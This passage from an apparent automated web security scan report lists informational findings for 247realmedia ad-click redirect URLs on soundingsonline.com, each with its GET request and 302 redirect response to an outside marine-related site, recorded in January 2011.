Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.408. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.409. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:10:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.410. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:04:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.411. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.412. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:20 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.413. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.414. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.415. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.416. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:06:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.417. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.418. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.419. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.420. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:43:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.421. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

